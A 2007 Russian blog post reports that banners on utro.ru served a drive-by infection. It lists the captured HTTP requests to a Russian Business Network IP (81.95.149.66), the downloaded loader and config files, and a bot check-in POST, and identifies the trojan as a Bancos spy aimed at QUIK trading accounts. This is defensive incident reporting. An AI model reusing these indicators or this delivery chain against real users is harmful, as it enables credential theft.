среда, 25 июля 2007 г.

utro.ru заражает посетителей

Cегодня около 16:00 на utro.ru семерка IE предложила установить Microsoft Data Access Object.

При подробном рассмотрении видим запросы в известный криминальный диапазон RBN

GET /e1/index.php HTTP/1.1\r\n
Referer: http://utro.ru/includes5/banners/advert_part.html/r/n
Host: 81.95.149.66\r\n

а дальше загрузка бота

GET /e1/file.php HTTP/1.1\r\n
GET /ldr1.exe HTTP/1.1\r\n
GET /cfg.bin HTTP/1.0\r\n
POST /s.php?1=april_002fdf3f&i= HTTP/1.0\r\n

В корне с: остался файл 3.tmp. Детектируется большинством антивирусов как

Trojan-Spy.Win32.Bancos.aam

В windows/system32 поселился ntos.exe. Детектится также.

По уточненной информации из Лаборатории Касперского троян ориентирован на кражу аккаунтов системы QUIK.

QUIK — это программный комплекс для организации доступа к биржевым торговым системам в режиме on-line. Совершение сделок с ценными бумагами через интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через интернет.


utro.ru уведомили

RBN извинилась и троян прибила вместе с сервером
Отправить комментарий